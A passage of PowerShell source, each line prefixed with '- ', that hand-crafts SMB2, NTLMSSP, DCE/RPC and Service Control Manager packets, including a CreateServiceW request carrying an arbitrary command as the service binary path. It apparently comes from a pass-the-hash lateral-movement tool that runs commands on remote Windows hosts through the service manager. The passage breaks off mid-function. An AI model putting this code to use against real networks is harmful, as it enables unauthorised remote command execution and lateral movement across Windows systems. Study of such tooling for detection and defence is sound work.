- param([Byte[]]$packet_security_blob)
-
- [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
- $packet_security_blob_length = $packet_security_blob_length[0,1]
-
- $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize",[Byte[]](0x19,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags",[Byte[]](0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode",[Byte[]](0x01))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset",[Byte[]](0x58,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength",$packet_security_blob_length)
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer",$packet_security_blob)
-
- return $packet_SMB2SessionSetupRequest
- }
-
- function Get-PacketSMB2TreeConnectRequest()
- {
- param([Byte[]]$packet_path)
-
- [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
- $packet_path_length = $packet_path_length[0,1]
-
- $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize",[Byte[]](0x09,0x00))
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved",[Byte[]](0x00,0x00))
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset",[Byte[]](0x48,0x00))
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength",$packet_path_length)
- $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer",$packet_path)
-
- return $packet_SMB2TreeConnectRequest
- }
-
- function Get-PacketSMB2CreateRequestFile()
- {
- param([Byte[]]$packet_named_pipe)
-
- $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
- $packet_named_pipe_length = $packet_named_pipe_length[0,1]
-
- $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize",[Byte[]](0x39,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags",[Byte[]](0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel",[Byte[]](0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes",[Byte[]](0x80,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions",[Byte[]](0x40,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset",[Byte[]](0x78,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength",$packet_named_pipe_length)
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer",$packet_named_pipe)
-
- return $packet_SMB2CreateRequestFile
- }
-
- function Get-PacketSMB2ReadRequest()
- {
- param ([Byte[]]$packet_file_ID)
-
- $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize",[Byte[]](0x31,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding",[Byte[]](0x50))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags",[Byte[]](0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length",[Byte[]](0x00,0x00,0x10,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID",$packet_file_ID)
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset",[Byte[]](0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength",[Byte[]](0x00,0x00))
- $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer",[Byte[]](0x30))
-
- return $packet_SMB2ReadRequest
- }
-
- function Get-PacketSMB2WriteRequest()
- {
- param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
-
- [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
-
- $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize",[Byte[]](0x31,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset",[Byte[]](0x70,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length",$packet_write_length)
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID",$packet_file_ID)
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset",[Byte[]](0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength",[Byte[]](0x00,0x00))
- $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags",[Byte[]](0x00,0x00,0x00,0x00))
-
- return $packet_SMB2WriteRequest
- }
-
- function Get-PacketSMB2CloseRequest()
- {
- param ([Byte[]]$packet_file_ID)
-
- $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize",[Byte[]](0x18,0x00))
- $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags",[Byte[]](0x00,0x00))
- $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID",$packet_file_ID)
-
- return $packet_SMB2CloseRequest
- }
-
- function Get-PacketSMB2TreeDisconnectRequest()
- {
- $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize",[Byte[]](0x04,0x00))
- $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved",[Byte[]](0x00,0x00))
-
- return $packet_SMB2TreeDisconnectRequest
- }
-
- function Get-PacketSMB2SessionLogoffRequest()
- {
- $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize",[Byte[]](0x04,0x00))
- $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved",[Byte[]](0x00,0x00))
-
- return $packet_SMB2SessionLogoffRequest
- }
-
- #NTLM
-
- function Get-PacketNTLMSSPNegotiate()
- {
- param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version)
-
- [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length)
- $packet_NTLMSSP_length = $packet_NTLMSSP_length[0]
- [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32
- [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22
- [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20
- [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2
-
- $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID",[Byte[]](0x60)) # the ASN.1 key names are likely not all correct
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength",$packet_ASN_length_1)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID",[Byte[]](0x06))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength",[Byte[]](0x06))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID",[Byte[]](0xa0))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength",$packet_ASN_length_2)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2",[Byte[]](0x30))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2",$packet_ASN_length_3)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID",[Byte[]](0xa0))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength",[Byte[]](0x0e))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2",[Byte[]](0x30))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2",[Byte[]](0x0c))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3",[Byte[]](0x06))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3",[Byte[]](0x0a))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID",[Byte[]](0xa2))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength",$packet_ASN_length_4)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID",[Byte[]](0x04))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength",$packet_NTLMSSP_length)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags",$packet_negotiate_flags)
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
-
- if($packet_version)
- {
- $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version",$packet_version)
- }
-
- return $packet_NTLMSSPNegotiate
- }
-
- function Get-PacketNTLMSSPAuth()
- {
- param([Byte[]]$packet_NTLM_response)
-
- [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length)
- $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0]
- [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12)
- $packet_ASN_length_1 = $packet_ASN_length_1[1,0]
- [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8)
- $packet_ASN_length_2 = $packet_ASN_length_2[1,0]
- [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4)
- $packet_ASN_length_3 = $packet_ASN_length_3[1,0]
-
- $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID",[Byte[]](0xa1,0x82))
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength",$packet_ASN_length_1)
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2",[Byte[]](0x30,0x82))
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2",$packet_ASN_length_2)
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3",[Byte[]](0xa2,0x82))
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3",$packet_ASN_length_3)
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID",[Byte[]](0x04,0x82))
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength",$packet_NTLMSSP_length)
- $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse",$packet_NTLM_response)
-
- return $packet_NTLMSSPAuth
- }
-
- #RPC
-
- function Get-PacketRPCBind()
- {
- param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version)
-
- [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
-
- $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_RPCBind.Add("RPCBind_Version",[Byte[]](0x05))
- $packet_RPCBind.Add("RPCBind_VersionMinor",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_PacketType",[Byte[]](0x0b))
- $packet_RPCBind.Add("RPCBind_PacketFlags",[Byte[]](0x03))
- $packet_RPCBind.Add("RPCBind_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_FragLength",[Byte[]](0x48,0x00))
- $packet_RPCBind.Add("RPCBind_AuthLength",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_CallID",$packet_call_ID_bytes)
- $packet_RPCBind.Add("RPCBind_MaxXmitFrag",[Byte[]](0xb8,0x10))
- $packet_RPCBind.Add("RPCBind_MaxRecvFrag",[Byte[]](0xb8,0x10))
- $packet_RPCBind.Add("RPCBind_AssocGroup",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_NumCtxItems",$packet_num_ctx_items)
- $packet_RPCBind.Add("RPCBind_Unknown",[Byte[]](0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_ContextID",$packet_context_ID)
- $packet_RPCBind.Add("RPCBind_NumTransItems",[Byte[]](0x01))
- $packet_RPCBind.Add("RPCBind_Unknown2",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_Interface",$packet_UUID)
- $packet_RPCBind.Add("RPCBind_InterfaceVer",$packet_UUID_version)
- $packet_RPCBind.Add("RPCBind_InterfaceVerMinor",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60))
- $packet_RPCBind.Add("RPCBind_TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00))
-
- if($packet_num_ctx_items[0] -eq 2)
- {
- $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00))
- $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01))
- $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a))
- $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
- }
- elseif($packet_num_ctx_items[0] -eq 3)
- {
- $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00))
- $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01))
- $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
- $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36))
- $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x02,0x00))
- $packet_RPCBind.Add("RPCBind_NumTransItems3",[Byte[]](0x01))
- $packet_RPCBind.Add("RPCBind_Unknown4",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46))
- $packet_RPCBind.Add("RPCBind_InterfaceVer3",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_InterfaceVerMinor3",[Byte[]](0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a))
- $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x04))
- $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_ContextID4",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
- $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
- $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
- }
-
- if($packet_call_ID -eq 3)
- {
- $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a))
- $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x02))
- $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00))
- $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00))
- $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2))
- $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f))
- }
-
- return $packet_RPCBind
- }
-
- function Get-PacketRPCRequest()
- {
- param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data)
-
- if($packet_auth_length -gt 0)
- {
- $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8
- }
-
- [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length)
- [Byte[]]$packet_frag_length = $packet_write_length[0,1]
- [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length)
- [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)
- $packet_auth_length = $packet_auth_length[0,1]
-
- $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_RPCRequest.Add("RPCRequest_Version",[Byte[]](0x05))
- $packet_RPCRequest.Add("RPCRequest_VersionMinor",[Byte[]](0x00))
- $packet_RPCRequest.Add("RPCRequest_PacketType",[Byte[]](0x00))
- $packet_RPCRequest.Add("RPCRequest_PacketFlags",$packet_flags)
- $packet_RPCRequest.Add("RPCRequest_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00))
- $packet_RPCRequest.Add("RPCRequest_FragLength",$packet_frag_length)
- $packet_RPCRequest.Add("RPCRequest_AuthLength",$packet_auth_length)
- $packet_RPCRequest.Add("RPCRequest_CallID",$packet_call_ID)
- $packet_RPCRequest.Add("RPCRequest_AllocHint",$packet_alloc_hint)
- $packet_RPCRequest.Add("RPCRequest_ContextID",$packet_context_ID)
- $packet_RPCRequest.Add("RPCRequest_Opnum",$packet_opnum)
-
- if($packet_data.Length)
- {
- $packet_RPCRequest.Add("RPCRequest_Data",$packet_data)
- }
-
- return $packet_RPCRequest
- }
-
- #SCM
-
- function Get-PacketSCMOpenSCManagerW()
- {
- param ([Byte[]]$packet_service,[Byte[]]$packet_service_length)
-
- [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92)
- [Byte[]]$packet_frag_length = $packet_write_length[0,1]
- [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68)
- $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $packet_referent_ID1 += 0x00,0x00
- $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $packet_referent_ID2 += 0x00,0x00
-
- $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID",$packet_referent_ID1)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount",$packet_service_length)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount",$packet_service_length)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName",$packet_service)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID",$packet_referent_ID2)
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown",[Byte[]](0xbf,0xbf))
- $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask",[Byte[]](0x3f,0x00,0x00,0x00))
-
- return $packet_SCMOpenSCManagerW
- }
-
- function Get-PacketSCMCreateServiceW()
- {
- param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length,
- [Byte[]]$packet_command,[Byte[]]$packet_command_length)
-
- $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $packet_referent_ID += 0x00,0x00
-
- $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle",$packet_context_handle)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount",$packet_service_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount",$packet_service_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName",$packet_service)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID",$packet_referent_ID)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount",$packet_service_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount",$packet_service_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName",$packet_service)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount",$packet_command_length)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount",$packet_command_length)
